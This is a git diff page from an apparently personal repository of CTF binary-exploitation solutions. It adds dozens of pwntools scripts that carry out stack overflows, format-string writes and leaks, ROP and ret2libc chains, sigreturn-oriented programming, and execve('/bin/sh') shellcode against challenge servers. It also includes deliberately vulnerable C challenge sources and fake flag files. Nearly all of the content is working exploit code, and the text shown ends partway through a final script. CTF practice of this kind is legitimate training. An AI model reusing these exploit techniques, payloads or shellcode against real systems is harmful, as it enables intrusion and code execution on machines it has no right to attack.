Compare commits
156 Commits
7d901b7449
..
main
| Author | SHA1 | Date | |
|---|---|---|---|
 jc
|
6402b4e2a9 | ||
|
jc
|
e5e052ef8b | ||
|
jc
|
48d9b4ecb1 | ||
|
jc
|
7779d922cf | ||
|
jc
|
8a12eae871 | ||
|
jc
|
d8f2ba18d8 | ||
|
jc
|
96683cf9ce | ||
|
jc
|
e582d2536a | ||
|
jc
|
efa1c23dbb | ||
|
jc
|
15003e5606 | ||
|
jc
|
7722ca5a21 | ||
|
jc
|
e29ebfb654 | ||
|
jc
|
01d5e47459 | ||
|
jc
|
f1b113f802 | ||
|
jc
|
3d11a08530 | ||
|
jc
|
22df1755c0 | ||
|
jc
|
18a146b1a5 | ||
|
jc
|
5e0b579bfc | ||
|
jc
|
16e21c1763 | ||
|
jc
|
5a5b449511 | ||
|
jc
|
2dd6d163af | ||
|
jc
|
9a2edba20d | ||
|
jc
|
476fe82faf | ||
|
jc
|
828a4eca97 | ||
|
jc
|
72f01e0427 | ||
|
jc
|
c0b1f1e2d3 | ||
|
jc
|
831408aedf | ||
|
jc
|
6dca4f2970 | ||
|
jc
|
c01f22eab5 | ||
|
jc
|
d047d4a1ef | ||
|
jc
|
baab6f675e | ||
|
jc
|
72e17002f9 | ||
|
jc
|
d087cb7430 | ||
|
jc
|
ec2cdb7b35 | ||
|
jc
|
4af1604d90 | ||
|
jc
|
c675b28f26 | ||
|
jc
|
153fd786b8 | ||
|
jc
|
40c7bc25ee | ||
|
jc
|
4a2179ad71 | ||
|
jc
|
dbb004526e | ||
|
jc
|
8009ca1f5f | ||
|
jc
|
e05b881fa7 | ||
 jc
|
88c88f3a62 | ||
|
jc
|
483f58ba63 | ||
|
jc
|
b98813ca8a | ||
|
jc
|
4ea52ad817 | ||
|
jc
|
a7ad2fc055 | ||
|
jc
|
90dcd7da8b | ||
|
jc
|
22ae6d18ef | ||
|
jc
|
7ac3f4d224 | ||
|
jc
|
2bb59fb08f | ||
|
jc
|
15d9e43702 | ||
|
jc
|
9032cf633c | ||
|
jc
|
dbfe2c981b | ||
|
jc
|
02ed79a775 | ||
|
jc
|
a066585f12 | ||
|
jc
|
fcf3a9ee0f | ||
|
jc
|
7f8eed4e60 | ||
|
jc
|
9d44530e70 | ||
|
jc
|
75d63586b3 | ||
|
jc
|
af72710a35 | ||
|
jc
|
9bfd5552b2 | ||
|
jc
|
11486f525c | ||
|
jc
|
fc30e1e38c | ||
|
jc
|
e076f1ee01 | ||
|
jc
|
ac8a3bc7a9 | ||
|
jc
|
33e18b7b00 | ||
|
jc
|
775502ff2a | ||
|
jc
|
a70a98afc4 | ||
|
jc
|
ac464ebd74 | ||
|
jc
|
e22305275f | ||
|
jc
|
f93869c059 | ||
|
jc
|
0310370a2e | ||
|
jc
|
7ccc26a4f6 | ||
|
jc
|
37f00f4322 | ||
|
jc
|
69328686b0 | ||
|
jc
|
29243e6a69 | ||
|
jc
|
3167ec2181 | ||
|
jc
|
0dba4c91ab | ||
|
jc
|
a06dc4e7a8 | ||
|
jc
|
464e60118d | ||
|
jc
|
34260465db | ||
|
jc
|
de0927e6c6 | ||
|
jc
|
227524ceac | ||
|
jc
|
7fc17ce834 | ||
|
jc
|
c46956e88d | ||
|
jc
|
437625403b | ||
|
jc
|
d8af98b051 | ||
|
jc
|
deab8877c6 | ||
|
jc
|
534786af14 | ||
|
jc
|
a92eb896d1 | ||
|
jc
|
6aa37b8571 | ||
|
jc
|
5f56f5e7e3 | ||
|
jc
|
4cc0dcab43 | ||
|
jc
|
e8d31313ef | ||
|
jc
|
9665209a76 | ||
|
jc
|
f03955debc | ||
|
jc
|
85d6906fae | ||
|
jc
|
d0c429824f | ||
|
jc
|
031201a421 | ||
|
jc
|
3b9dba1423 | ||
|
jc
|
21b17c6f04 | ||
|
jc
|
067cabe828 | ||
|
jc
|
8709b54d81 | ||
|
jc
|
6ad0bccc1a | ||
|
jc
|
634b1ab1d5 | ||
|
jc
|
5476a2e3ff | ||
|
jc
|
5191989368 | ||
|
jc
|
3d7dffbaa3 | ||
|
jc
|
a44f6a8368 | ||
|
jc
|
05d7dab3fb | ||
|
jc
|
10ac152ca1 | ||
|
jc
|
791e7b9c99 | ||
|
jc
|
5340d5e29e | ||
|
jc
|
38bdf097b9 | ||
|
jc
|
f8e6ea66d2 | ||
|
jc
|
481177cdcb | ||
|
jc
|
03542d0718 | ||
|
jc
|
d690f93d83 | ||
|
jc
|
c71564b667 | ||
|
jc
|
5fade1f343 | ||
|
jc
|
85fea97836 | ||
|
jc
|
853acb8ecf | ||
|
jc
|
9f7a92d635 | ||
|
jc
|
339488b990 | ||
|
jc
|
083b13e139 | ||
|
jc
|
b4f7309082 | ||
|
jc
|
62b2515039 | ||
|
jc
|
609ab7d057 | ||
|
jc
|
1545329292 | ||
|
jc
|
ab4d74d35e | ||
|
jc
|
d4c477f9f9 | ||
|
jc
|
4f91b8d5f8 | ||
|
jc
|
ecb666932f | ||
|
jc
|
61f2abc882 | ||
|
jc
|
4ff87bf93b | ||
|
jc
|
891e0d6b16 | ||
|
jc
|
fb603dfa60 | ||
|
jc
|
92ec613644 | ||
|
jc
|
3e4988716a | ||
|
jc
|
7cbcd054c3 | ||
|
jc
|
4153f58c73 | ||
|
jc
|
2abac594dc | ||
|
jc
|
dfd521d190 | ||
|
jc
|
33d52a6d0f | ||
|
jc
|
bfe1478c01 | ||
|
jc
|
5534052b96 | ||
|
jc
|
c6c10aaf35 | ||
|
jc
|
31dbf17bda | ||
|
jc
|
6ccc9f60d0 | ||
|
jc
|
a4e1a18d3f | ||
|
jc
|
815575f8a8 | ||
|
jc
|
5bdccf9a91 | ||
|
jc
|
9713fcda8c | ||
|
jc
|
db18ac85fd | ||
|
jc
|
a90b87e454 |
@@ -0,0 +1,16 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./floormat_sale", checksec=False)
|
||||
# r = process()
|
||||
r = remote("floormatsale.ctf.intigriti.io", 1339)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
s(b"6")
|
||||
s(b"%1c%11$n"+p64(0x40408c))
|
||||
|
||||
r.interactive()
|
||||
BIN
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./retro2win", checksec=False)
|
||||
# r = process()
|
||||
r = remote("retro2win.ctf.intigriti.io", 1338)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# gadgets
|
||||
pop_rdi = 0x4009b3
|
||||
pop_rsi_r15 = 0x4009b1
|
||||
|
||||
# leak
|
||||
s(b"1337")
|
||||
buf = b"A"*24
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(0x2323232323232323)
|
||||
buf += p64(pop_rsi_r15)
|
||||
buf += p64(0x4242424242424242)
|
||||
buf += p64(0)
|
||||
buf += p64(target.sym.cheat_mode)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./rigged_slot2", checksec=False)
|
||||
# r = process()
|
||||
r = remote("riggedslot2.ctf.intigriti.io", 1337)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b":", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*20
|
||||
buf += p64(1337421)
|
||||
s(buf)
|
||||
s(b"1")
|
||||
|
||||
r.interactive()
|
||||
BIN
Binary file not shown.
@@ -0,0 +1,25 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.log_level = 'error'
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
for i in range(1, 100):
|
||||
r = remote("5108fea3f4263a9f.247ctf.com", 50099)
|
||||
buf = f"%{i}$s".encode()
|
||||
try:
|
||||
s(buf)
|
||||
r.recvuntil(b"back ")
|
||||
out = r.recvlineS()
|
||||
if "247CTF" in out:
|
||||
print(out)
|
||||
break
|
||||
except:
|
||||
pass
|
||||
r.close()
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hidden_flag_function", checksec=False)
|
||||
# r = process()
|
||||
r = remote("9fe3144560d92c37.247ctf.com", 50224)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"?", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*76
|
||||
buf += p64(target.sym.flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
BIN
Binary file not shown.
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./hidden_flag_function_with_args", checksec=False)
|
||||
# r = process()
|
||||
r = remote("f3396cb78c7c71ca.247ctf.com", 50257)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*140
|
||||
buf += p32(target.sym.flag)
|
||||
buf += p32(0)
|
||||
buf += p32(0x1337)
|
||||
buf += p32(0x247)
|
||||
buf += p32(0x12345678)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
@@ -0,0 +1,19 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
|
||||
# r = process()
|
||||
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*280
|
||||
buf += p64(target.sym.gets)
|
||||
buf += p64(target.sym.win)
|
||||
s(buf)
|
||||
s(b"flag")
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,41 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
|
||||
# r = process()
|
||||
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*272
|
||||
buf += p64(0x404118)
|
||||
buf += p64(0x40129e)
|
||||
buf += b"A"*280
|
||||
buf += p64(target.sym.main)
|
||||
s(buf)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b"@\n")
|
||||
puts = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("puts: %#x", puts)
|
||||
libc = puts - 0x80e50
|
||||
log.info("libc: %#x", libc)
|
||||
system = libc + 0x50d70
|
||||
sh = libc + 0x1d8678
|
||||
|
||||
# gadgets
|
||||
pop_rdi = libc + 0x2a3e5
|
||||
|
||||
# pop
|
||||
buf = b"A"*280
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(sh)
|
||||
buf += p64(pop_rdi+1)
|
||||
buf += p64(pop_rdi+1)
|
||||
buf += p64(system)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./echo-app", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8008)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*264
|
||||
buf += p64(target.sym.print_flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,20 @@
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void print_flag() {
|
||||
puts(getenv("FLAG"));
|
||||
puts("^^ Flag!!111!!!! ^^");
|
||||
}
|
||||
|
||||
void do_echo() {
|
||||
uint8_t echo_buffer[256] = {0};
|
||||
gets(echo_buffer);
|
||||
puts(echo_buffer);
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
puts("ECHO! Echo! echo!");
|
||||
do_echo();
|
||||
return 0;
|
||||
}
|
||||
@@ -0,0 +1,28 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./echo-app2", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8009)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
buf = b"%39$p.%42$p"
|
||||
s(buf)
|
||||
leaks = r.recvS(34).split(".")
|
||||
canary = int(leaks[0], 16)
|
||||
log.info("canary: %#x", canary)
|
||||
target.address = int(leaks[1], 16)-0x15a1
|
||||
log.info("main: %#x", target.address)
|
||||
|
||||
# buf
|
||||
buf = b"A"*264
|
||||
buf += p64(canary)
|
||||
buf += p64(0)
|
||||
buf += p64(target.sym.print_flag)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,36 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./ihnsaims", checksec=False)
|
||||
# r = process("./ihnsaims flag{fake_flag}", shell=True)
|
||||
r = remote("54.85.45.101", 8002)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"!\n", a)
|
||||
|
||||
# write
|
||||
s(b"1")
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea r12, [rdx]
|
||||
a:
|
||||
lea r12, [r12+0x1000]
|
||||
mov rdi, 1
|
||||
mov rsi, r12
|
||||
mov rdx, 0x1000
|
||||
mov rax, 1
|
||||
syscall
|
||||
cmp rax, -14
|
||||
je a
|
||||
jne b
|
||||
b:
|
||||
xor rdi, rdi
|
||||
mov rax, 231
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,24 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./only_ws", checksec=False)
|
||||
# r = process()
|
||||
r = remote("54.85.45.101", 8005)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
mov rax, 1
|
||||
mov rdi, 1
|
||||
mov rsi, 0x4040a0
|
||||
xor rdx, rdx
|
||||
add dl, 0xff
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1,43 @@
|
||||
#include <seccomp.h>
|
||||
#include <syscall.h>
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/mman.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <string.h>
|
||||
|
||||
typedef void shellcode();
|
||||
char flag[64];
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
setvbuf(stdin, NULL, _IONBF, 0);
|
||||
setvbuf(stderr, NULL, _IONBF, 0);
|
||||
FILE *f = fopen("flag.txt", "r");
|
||||
if (f == NULL) {
|
||||
printf("error reading flag");
|
||||
return -1;
|
||||
}
|
||||
|
||||
fscanf(f, "%s", flag);
|
||||
printf("Flag is at 0x%x\n", (void *)flag);
|
||||
fclose(f);
|
||||
|
||||
char shellcode_buf[4096];
|
||||
int bytes_read = read(STDIN_FILENO, shellcode_buf, sizeof(shellcode_buf));
|
||||
|
||||
void *shellcode_ptr =
|
||||
mmap((void *)shellcode_buf, 1, PROT_READ | PROT_WRITE | PROT_EXEC,
|
||||
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
memcpy(shellcode_ptr, shellcode_buf, bytes_read);
|
||||
|
||||
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
|
||||
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
|
||||
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
|
||||
|
||||
seccomp_load(ctx);
|
||||
seccomp_release(ctx);
|
||||
((shellcode *)shellcode_ptr)();
|
||||
}
|
||||
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./blessing", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# leak
|
||||
r.recvuntil(b"this: ")
|
||||
malloced = int(r.recv(14), 16)
|
||||
log.info("malloced: %#x", malloced)
|
||||
|
||||
# buf
|
||||
r.recvuntil(b"song?")
|
||||
s(str(malloced+1).encode())
|
||||
s(b"0")
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_f0r_t35t1ng}
|
||||
BIN
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,36 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./contractor", checksec=False)
|
||||
|
||||
while True:
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a,b: r.sendafter(a, b)
|
||||
sl = lambda a,b: r.sendlineafter(a, b)
|
||||
fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
|
||||
opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
|
||||
|
||||
# leak
|
||||
fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
|
||||
r.recvuntil(b"C"*8)
|
||||
target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
|
||||
log.info("pie: %#x", target.address)
|
||||
|
||||
# write
|
||||
opt(b"4", b"A"*28+p32(0)+b"\x40")
|
||||
sl(b"> ", b"no")
|
||||
opt(b"4", p64(target.sym.contract))
|
||||
|
||||
r.recvuntil(b"lad!\n\n")
|
||||
|
||||
try:
|
||||
r.sendline(b"id")
|
||||
if r.recvline():
|
||||
break
|
||||
except EOFError:
|
||||
pass
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_f0r_t35t1ng}
|
||||
BIN
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,37 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./crossbow", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
ss = lambda a: r.sendlineafter(b"> ", a)
|
||||
|
||||
# gadgets
|
||||
pop_rax = 0x401001
|
||||
pop_rdi = 0x401d6c
|
||||
pop_rsi = 0x40566b
|
||||
pop_rdx = 0x401139
|
||||
syscall = 0x4015d3
|
||||
mov_rax_rdi = 0x4020f5
|
||||
|
||||
# buf
|
||||
buf = b"JUNK"*2
|
||||
buf += p64(pop_rax)
|
||||
buf += b"/bin/sh\0"
|
||||
buf += p64(pop_rdi)
|
||||
buf += p64(0x40d500)
|
||||
buf += p64(mov_rax_rdi)
|
||||
buf += p64(pop_rax)
|
||||
buf += p64(59)
|
||||
buf += p64(pop_rsi)
|
||||
buf += p64(0)
|
||||
buf += p64(pop_rdx)
|
||||
buf += p64(0)
|
||||
buf += p64(syscall)
|
||||
s(b"-2")
|
||||
ss(buf)
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./laconic", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.send(a)
|
||||
|
||||
# gadgets
|
||||
pop_rax = 0x43018
|
||||
syscall = 0x43015
|
||||
|
||||
# sigframe
|
||||
frame = SigreturnFrame()
|
||||
frame.rax = 0
|
||||
frame.rdi = 0
|
||||
frame.rsi = 0x43005
|
||||
frame.rdx = 0xff
|
||||
frame.rip = syscall
|
||||
|
||||
# buf
|
||||
buf = b"A"*8
|
||||
buf += p64(pop_rax)
|
||||
buf += p64(0xf)
|
||||
buf += p64(syscall)
|
||||
buf += bytes(frame)
|
||||
|
||||
# shellcode
|
||||
sc = """
|
||||
lea rdi, [rsi+32]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov al, 59
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"/bin/sh\0"
|
||||
buf += sc
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./quack_quack", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendafter(b"> ", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*89
|
||||
buf += b"Quack Quack "
|
||||
buf += b"B"
|
||||
s(buf)
|
||||
r.recvuntil(b"Quack Quack ")
|
||||
canary = u64(r.recv(7).rjust(8, b"\x00"))
|
||||
log.info("canary: %#x", canary)
|
||||
|
||||
# buf
|
||||
buf = b"A"*88
|
||||
buf += p64(canary)
|
||||
buf += b"JUNK"*2
|
||||
buf += p64(target.sym.duck_attack)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
@@ -0,0 +1 @@
|
||||
HTB{f4k3_fl4g_4_t35t1ng}
|
||||
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,48 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
from ctypes import CDLL
|
||||
|
||||
context.binary = target = ELF("./last_key", checksec=False)
|
||||
libc = target.libc
|
||||
lib = CDLL("./glibc/libc.so.6")
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# nums
|
||||
lib.srand(lib.time(0))
|
||||
first_rand = (lib.rand() % 5) + 1
|
||||
second_rand = (lib.rand() % 10) + 10
|
||||
diff = second_rand - first_rand
|
||||
|
||||
# buf
|
||||
for _ in range(diff):
|
||||
s(b"R")
|
||||
|
||||
# gadgets
|
||||
pop_rdi = lambda a: p64(0x40178d) + p64(a)
|
||||
|
||||
# leak
|
||||
buf = b"A"*24
|
||||
buf += pop_rdi(target.got.puts)
|
||||
buf += p64(target.sym.puts)
|
||||
buf += p64(target.sym.set_score)
|
||||
s(buf)
|
||||
r.recvuntil(b"prize..\n\n")
|
||||
puts = u64(r.recv(6).ljust(8, b"\x00"))
|
||||
log.info("puts: %#x", puts)
|
||||
libc.address = puts - libc.sym.puts
|
||||
log.info("libc: %#x", libc.address)
|
||||
system = libc.sym.system
|
||||
sh = next(libc.search(b"/bin/sh\0"))
|
||||
|
||||
# pop
|
||||
buf = b"A"*25
|
||||
buf += pop_rdi(sh)
|
||||
buf += p64(0x40178e)
|
||||
buf += p64(system)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./riddle", checksec=False)
|
||||
r = process()
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b">> ", a)
|
||||
ss = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
s(b"1")
|
||||
ss(b"2147483647")
|
||||
ss(b"1")
|
||||
|
||||
r.interactive()
|
||||
BIN
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./challenge", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 5050)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"> ", a)
|
||||
ss = lambda a: r.sendline(a)
|
||||
|
||||
# buf
|
||||
s(b"12")
|
||||
ss(b"flag.txt\0")
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./flow", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 7001)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
buf = b"A"*60
|
||||
buf += p32(0x34333231)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,18 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./heap_wars", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1337)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b": ", a)
|
||||
|
||||
# buf
|
||||
s(b"1")
|
||||
buf = b"A"*80
|
||||
buf += p64(target.sym.theForce)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,32 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1244)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
|
||||
# leak
|
||||
buf = b"%7$p"
|
||||
s(buf)
|
||||
r.recvuntil(b"tune : ")
|
||||
heap = int(r.recvline().strip(), 16) + 0x850
|
||||
log.info("heap: %#x", heap)
|
||||
|
||||
# sc
|
||||
sc = """
|
||||
lea rdi, [rdx+19]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 59
|
||||
syscall
|
||||
"""
|
||||
sc = asm(sc) + b"/bin/sh\0"
|
||||
sc += b"A"*(32-len(sc))
|
||||
sc += p64(heap)
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
BIN
Binary file not shown.
Binary file not shown.
BIN
Binary file not shown.
@@ -0,0 +1,20 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./nihil", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 7002)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendlineafter(b"?", a)
|
||||
|
||||
# buf
|
||||
s(b"a")
|
||||
buf = b"A"*16
|
||||
buf += p64(0)
|
||||
buf += b"JUNK"
|
||||
buf += p32(727)
|
||||
s(buf)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./challenge", checksec=False)
|
||||
# r = process()
|
||||
r = remote("94.72.112.248", 1243)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
inc = lambda: r.sendline(b"2")
|
||||
|
||||
# read
|
||||
for i in range(3): s(b"3")
|
||||
s(b"5")
|
||||
s(b"6") # 48
|
||||
inc()
|
||||
s(b"4")
|
||||
s(b"3")
|
||||
s(b"5") # 89
|
||||
inc()
|
||||
for i in range(2): s(b"4")
|
||||
for i in range(2): s(b"3")
|
||||
for i in range(5): s(b"6")
|
||||
s(b"5") # d6
|
||||
inc()
|
||||
for i in range(3): s(b"3")
|
||||
s(b"5")
|
||||
s(b"6") # 48
|
||||
inc()
|
||||
for i in range(4): s(b"3")
|
||||
for i in range(6): s(b"6")
|
||||
s(b"5") # 31
|
||||
inc()
|
||||
for i in range(2): s(b"4")
|
||||
for i in range(3): s(b"6")
|
||||
s(b"3")
|
||||
s(b"5") # d2
|
||||
inc()
|
||||
for i in range(2): s(b"4")
|
||||
for i in range(9): s(b"6")
|
||||
for i in range(2): s(b"3")
|
||||
s(b"5") # b2
|
||||
inc()
|
||||
for i in range(17): s(b"5") # ff
|
||||
inc()
|
||||
s(b"5") # 0f
|
||||
inc()
|
||||
for i in range(2): s(b"3")
|
||||
s(b"5")
|
||||
for i in range(6): s(b"6") # 05
|
||||
s(b"7")
|
||||
|
||||
# execve
|
||||
sc = """
|
||||
lea rdi, [rsi+35]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
mov rax, 59
|
||||
syscall
|
||||
"""
|
||||
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
|
||||
s(sc)
|
||||
|
||||
r.interactive()
|
||||
Executable
BIN
Binary file not shown.
BIN
Binary file not shown.
Executable
BIN
Binary file not shown.
@@ -0,0 +1,17 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
|
||||
context.binary = target = ELF("./fmt", checksec=False)
|
||||
